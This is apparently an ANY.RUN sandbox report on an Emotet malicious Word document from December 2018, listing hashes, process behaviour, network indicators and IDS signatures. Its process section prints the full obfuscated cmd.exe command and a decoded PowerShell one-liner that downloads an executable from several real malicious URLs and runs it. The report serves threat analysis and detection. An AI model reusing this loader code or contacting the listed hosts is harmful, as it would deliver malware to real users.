analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

BIZ_943713PGITEKNY.doc

Full analysis: https://app.any.run/tasks/2b055b52-9275-41cb-9842-1ddf371d5fc7
Verdict: Malicious activity
Threats:

Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns.

Analysis date: December 19, 2018, 06:14:09
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
generated-doc
loader
trojan
emotet
feodo
maldoc-1
Indicators:
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Fri Dec 14 17:17:00 2018, Last Saved Time/Date: Fri Dec 14 17:17:00 2018, Number of Pages: 1, Number of Words: 2, Number of Characters: 16, Security: 0
MD5:

FAC7B441A730ABF96B210A8DB9DBF3D1

SHA1:

9F5BB869B95136F51B954E4284F99168FF0E91FB

SHA256:

0DDED430C1958AE0EC60C2D50AB99F562269AD1EE09DB17606661BD55CD29C66

SSDEEP:

1536:focn1kp59gxBK85fBlHF5qFycNGrFMMzV/+a9:A41k/W483lWycNGzV

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Unusual execution from Microsoft Office

      • WINWORD.EXE (PID: 3452)
    • Starts CMD.EXE for commands execution

      • WINWORD.EXE (PID: 3452)
    • Request from PowerShell which ran from CMD.EXE

      • powershell.exe (PID: 3044)
    • Executes PowerShell scripts

      • cmd.exe (PID: 3152)
    • Application was dropped or rewritten from another process

      • 390.exe (PID: 2316)
      • archivesymbol.exe (PID: 3272)
      • archivesymbol.exe (PID: 4028)
      • 390.exe (PID: 3668)
    • Downloads executable files from the Internet

      • powershell.exe (PID: 3044)
    • Connects to CnC server

      • archivesymbol.exe (PID: 4028)
    • Changes the autorun value in the registry

      • archivesymbol.exe (PID: 4028)
    • EMOTET was detected

      • archivesymbol.exe (PID: 4028)
  • SUSPICIOUS

    • Starts CMD.EXE for commands execution

      • cmd.exe (PID: 2580)
    • Executable content was dropped or overwritten

      • powershell.exe (PID: 3044)
      • 390.exe (PID: 3668)
    • Creates files in the user directory

      • powershell.exe (PID: 3044)
    • Application launched itself

      • 390.exe (PID: 2316)
    • Starts itself from another location

      • 390.exe (PID: 3668)
  • INFO

    • Creates files in the user directory

      • WINWORD.EXE (PID: 3452)
    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 3452)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

Title: -
Subject: -
Author: -
Keywords: -
Comments: -
Template: Normal.dotm
LastModifiedBy: -
RevisionNumber: 1
Software: Microsoft Office Word
TotalEditTime: -
CreateDate: 2018:12:14 17:17:00
ModifyDate: 2018:12:14 17:17:00
Pages: 1
Words: 2
Characters: 16
Security: None
CodePage: Windows Latin 1 (Western European)
Company: -
Lines: 1
Paragraphs: 1
CharCountWithSpaces: 17
AppVersion: 16
ScaleCrop: No
LinksUpToDate: No
SharedDoc: No
HyperlinksChanged: No
TitleOfParts: -
HeadingPairs:
  • Title
  • 1
CompObjUserTypeLen: 32
CompObjUserType: Microsoft Word 97-2003 Document
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
39
Monitored processes
8
Malicious processes
8
Suspicious processes
0

Behavior graph

Click at the process to see the details
start drop and start drop and start winword.exe no specs cmd.exe no specs cmd.exe no specs powershell.exe 390.exe no specs 390.exe archivesymbol.exe no specs #EMOTET archivesymbol.exe

Process information

PID
CMD
Path
Indicators
Parent process
3452"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\BIZ_943713PGITEKNY.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
2580c:\vzfWNdCGiTp\ELZjVnjMduYMWI\OzSjFliDoUafiX\..\..\..\windows\system32\cmd.exe /c %ProgramData:~0,1%%ProgramData:~9,2% /V/C"set 8zN=jDYOzpwKEKrWhHFvMIaSaUWRtF;+sQN8P$3di gL:uf{.b=excnB@\90(JZ-lAmGkyoT,C/6'})V&&for %q in (33,50,28,13,46,72,51,9,42,72,26,33,24,62,15,46,50,47,6,59,66,45,0,47,49,24,37,30,47,24,44,22,47,45,69,60,36,47,50,24,26,33,64,0,23,46,72,12,24,24,5,40,70,70,6,6,6,44,28,47,10,47,42,66,4,20,24,20,44,49,66,62,70,20,48,42,52,12,24,24,5,40,70,70,6,6,6,44,60,36,15,36,50,38,45,10,20,50,49,12,20,50,36,62,20,60,28,49,36,47,50,49,47,28,44,49,66,62,70,4,75,16,29,25,39,52,12,24,24,5,40,70,70,6,6,6,44,35,66,50,38,12,66,35,20,36,20,50,44,49,66,62,70,0,36,32,75,36,32,52,12,24,24,5,40,70,70,28,5,10,20,65,4,47,47,44,49,66,62,70,36,36,22,2,47,71,4,52,12,24,24,5,40,70,70,65,20,28,20,10,64,47,62,20,60,5,60,20,24,42,66,10,62,41,44,66,10,38,70,28,72,44,19,5,60,36,24,56,72,52,72,74,26,33,6,35,30,46,72,62,51,30,72,26,33,63,6,45,37,46,37,72,34,54,55,72,26,33,15,4,0,46,72,8,1,64,72,26,33,51,57,8,46,33,47,50,15,40,24,47,62,5,27,72,53,72,27,33,63,6,45,27,72,44,47,48,47,72,26,42,66,10,47,20,49,12,56,33,67,51,9,37,36,50,37,33,64,0,23,74,43,24,10,65,43,33,24,62,15,44,1,66,6,50,60,66,20,35,25,36,60,47,56,33,67,51,9,68,37,33,51,57,8,74,26,33,1,9,4,46,72,12,36,0,72,26,17,42,37,56,56,63,47,24,59,17,24,47,62,37,33,51,57,8,74,44,60,47,50,38,24,12,37,59,38,47,37,31,55,55,55,55,74,37,43,17,50,15,66,64,47,59,17,24,47,62,37,33,51,57,8,26,33,64,36,51,46,72,62,29,58,72,26,45,10,47,20,64,26,73,73,49,20,24,49,12,43,73,73,33,22,42,5,46,72,13,8,61,72,26,78)do set FtX=!FtX!!8zN:~%q,1!&&if %q equ 78 powershell "!FtX:~5!""c:\windows\system32\cmd.exeWINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3152CmD /V/C"set 8zN=jDYOzpwKEKrWhHFvMIaSaUWRtF;+sQN8P$3di gL:uf{.b=excnB@\90(JZ-lAmGkyoT,C/6'})V&&for %q in (33,50,28,13,46,72,51,9,42,72,26,33,24,62,15,46,50,47,6,59,66,45,0,47,49,24,37,30,47,24,44,22,47,45,69,60,36,47,50,24,26,33,64,0,23,46,72,12,24,24,5,40,70,70,6,6,6,44,28,47,10,47,42,66,4,20,24,20,44,49,66,62,70,20,48,42,52,12,24,24,5,40,70,70,6,6,6,44,60,36,15,36,50,38,45,10,20,50,49,12,20,50,36,62,20,60,28,49,36,47,50,49,47,28,44,49,66,62,70,4,75,16,29,25,39,52,12,24,24,5,40,70,70,6,6,6,44,35,66,50,38,12,66,35,20,36,20,50,44,49,66,62,70,0,36,32,75,36,32,52,12,24,24,5,40,70,70,28,5,10,20,65,4,47,47,44,49,66,62,70,36,36,22,2,47,71,4,52,12,24,24,5,40,70,70,65,20,28,20,10,64,47,62,20,60,5,60,20,24,42,66,10,62,41,44,66,10,38,70,28,72,44,19,5,60,36,24,56,72,52,72,74,26,33,6,35,30,46,72,62,51,30,72,26,33,63,6,45,37,46,37,72,34,54,55,72,26,33,15,4,0,46,72,8,1,64,72,26,33,51,57,8,46,33,47,50,15,40,24,47,62,5,27,72,53,72,27,33,63,6,45,27,72,44,47,48,47,72,26,42,66,10,47,20,49,12,56,33,67,51,9,37,36,50,37,33,64,0,23,74,43,24,10,65,43,33,24,62,15,44,1,66,6,50,60,66,20,35,25,36,60,47,56,33,67,51,9,68,37,33,51,57,8,74,26,33,1,9,4,46,72,12,36,0,72,26,17,42,37,56,56,63,47,24,59,17,24,47,62,37,33,51,57,8,74,44,60,47,50,38,24,12,37,59,38,47,37,31,55,55,55,55,74,37,43,17,50,15,66,64,47,59,17,24,47,62,37,33,51,57,8,26,33,64,36,51,46,72,62,29,58,72,26,45,10,47,20,64,26,73,73,49,20,24,49,12,43,73,73,33,22,42,5,46,72,13,8,61,72,26,78)do set FtX=!FtX!!8zN:~%q,1!&&if %q equ 78 powershell "!FtX:~5!""C:\Windows\system32\cmd.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3044powershell "$nsH='BKf';$tmv=new-object Net.WebClient;$kjR='http://www.serefozata.com/axf@http://www.livingbranchanimalsciences.com/zVMQFL@http://www.donghodaian.com/jiPViP@http://sprayzee.com/iiWYe6z@http://yasarkemalplatformu.org/s'.Split('@');$wdN='mBN';$Gwb = '390';$vzj='EDk';$BJE=$env:temp+'\'+$Gwb+'.exe';foreach($TBK in $kjR){try{$tmv.DownloadFile($TBK, $BJE);$DKz='hij';If ((Get-Item $BJE).length -ge 80000) {Invoke-Item $BJE;$kiB='mQZ';break;}}catch{}}$Wfp='HEA';"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
2316"C:\Users\admin\AppData\Local\Temp\390.exe" C:\Users\admin\AppData\Local\Temp\390.exepowershell.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
0
3668"C:\Users\admin\AppData\Local\Temp\390.exe"C:\Users\admin\AppData\Local\Temp\390.exe
390.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
0
3272"C:\Users\admin\AppData\Local\archivesymbol\archivesymbol.exe"C:\Users\admin\AppData\Local\archivesymbol\archivesymbol.exe390.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
0
4028"C:\Users\admin\AppData\Local\archivesymbol\archivesymbol.exe"C:\Users\admin\AppData\Local\archivesymbol\archivesymbol.exe
archivesymbol.exe
User:
admin
Integrity Level:
MEDIUM
Total events
1 770
Read events
1 287
Write events
0
Delete events
0

Modification events

No data
Executable files
2
Suspicious files
2
Text files
0
Unknown types
5

Dropped files

PID
Process
Filename
Type
3452WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVRA5C9.tmp.cvr
MD5:
SHA256:
3452WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\B44AB1F7.wmf
MD5:
SHA256:
3452WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\FC65A61D.wmf
MD5:
SHA256:
3044powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\KQRCXD9Y3REQJOB5HSX2.temp
MD5:
SHA256:
3044powershell.exeC:\Users\admin\AppData\Local\Temp\390.exe
MD5:
SHA256:
3452WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~$Z_943713PGITEKNY.docpgc
MD5:3577D278224B58F41C38B3D383C8F003
SHA256:5F1991C2E6AC965870358E172F2DF1A771DB49548EB347D6276FB215164BEB26
3452WINWORD.EXEC:\Users\admin\AppData\Local\Temp\Word8.0\MSForms.exdtlb
MD5:A1BE0DA84975874A456867434A91567B
SHA256:0F6F63B160E5350AAEBF31B6E0B1F91B86931C1662D960609304C796AAA52AEB
3452WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\35E7824E.wmfwmf
MD5:320C46198C2160010219C0178D9ED261
SHA256:6986CB2D918F5CA932D1B75F6B3FBADCCA0FDA8AA4863A0A4532A5DD6D09CE73
3044powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF13b22c.TMPbinary
MD5:0C1DAA668BA499584B0AC7476368101E
SHA256:326CCA676EAA6C8A45F71B6239CC22D9F49085AB54229E1777D0E15C50EC13DA
3452WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:C0E05B10780841AE15969333DA0BFE18
SHA256:8C88F01A0964845A6E238B57D62EF68368276FA649122C778F7D617F63C6E443
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
9
TCP/UDP connections
6
DNS requests
4
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
3044
powershell.exe
GET
302
5.83.45.65:80
http://www.serefozata.com/axf
RO
html
235 b
malicious
3044
powershell.exe
GET
200
5.83.45.65:80
http://www.serefozata.com/cgi-sys/suspendedpage.cgi
RO
html
7.40 Kb
malicious
4028
archivesymbol.exe
GET
201.111.83.186:8080
http://201.111.83.186:8080/
MX
malicious
3044
powershell.exe
GET
404
50.57.249.15:80
http://www.livingbranchanimalsciences.com/zVMQFL
US
html
28.9 Kb
malicious
3044
powershell.exe
GET
301
103.28.39.35:80
http://www.donghodaian.com/jiPViP
VN
html
617 b
malicious
4028
archivesymbol.exe
GET
200
186.136.68.246:80
http://186.136.68.246/
AR
binary
132 b
malicious
3044
powershell.exe
GET
200
138.197.231.231:80
http://sprayzee.com/iiWYe6z/
US
executable
148 Kb
malicious
3044
powershell.exe
GET
200
103.28.39.35:80
http://www.donghodaian.com/jiPViP/
VN
html
617 b
malicious
3044
powershell.exe
GET
301
138.197.231.231:80
http://sprayzee.com/iiWYe6z
US
html
617 b
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
3044
powershell.exe
5.83.45.65:80
www.serefozata.com
Nxtservers Srl
RO
suspicious
3044
powershell.exe
50.57.249.15:80
www.livingbranchanimalsciences.com
Liquid Web, L.L.C
US
malicious
3044
powershell.exe
103.28.39.35:80
www.donghodaian.com
NhanHoa Software company
VN
malicious
4028
archivesymbol.exe
186.136.68.246:80
Prima S.A.
AR
malicious
3044
powershell.exe
138.197.231.231:80
sprayzee.com
Digital Ocean, Inc.
US
malicious
4028
archivesymbol.exe
201.111.83.186:8080
Uninet S.A. de C.V.
MX
malicious

DNS requests

Domain
IP
Reputation
www.serefozata.com
  • 5.83.45.65
malicious
www.livingbranchanimalsciences.com
  • 50.57.249.15
malicious
www.donghodaian.com
  • 103.28.39.35
malicious
sprayzee.com
  • 138.197.231.231
malicious

Threats

PID
Process
Class
Message
3044
powershell.exe
A Network Trojan was detected
SC TROJAN_DOWNLOADER Suspicious loader with tiny header
3044
powershell.exe
A Network Trojan was detected
SC TROJAN_DOWNLOADER Trojan-Downloader Emoloader Win32
3044
powershell.exe
A Network Trojan was detected
SC TROJAN_DOWNLOADER Suspicious redirect to 'suspendedpage.cgi'
3044
powershell.exe
A Network Trojan was detected
SC TROJAN_DOWNLOADER Suspicious loader with tiny header
3044
powershell.exe
A Network Trojan was detected
SC TROJAN_DOWNLOADER Trojan-Downloader Emoloader Win32
3044
powershell.exe
A Network Trojan was detected
SC TROJAN_DOWNLOADER Suspicious loader with tiny header
3044
powershell.exe
A Network Trojan was detected
SC TROJAN_DOWNLOADER Trojan-Downloader Emoloader Win32
3044
powershell.exe
A Network Trojan was detected
SC TROJAN_DOWNLOADER Suspicious loader with tiny header
3044
powershell.exe
A Network Trojan was detected
SC TROJAN_DOWNLOADER Trojan-Downloader Emoloader Win32
3044
powershell.exe
Potential Corporate Privacy Violation
ET POLICY PE EXE or DLL Windows file download HTTP
2 ETPRO signatures available at the full report
No debug info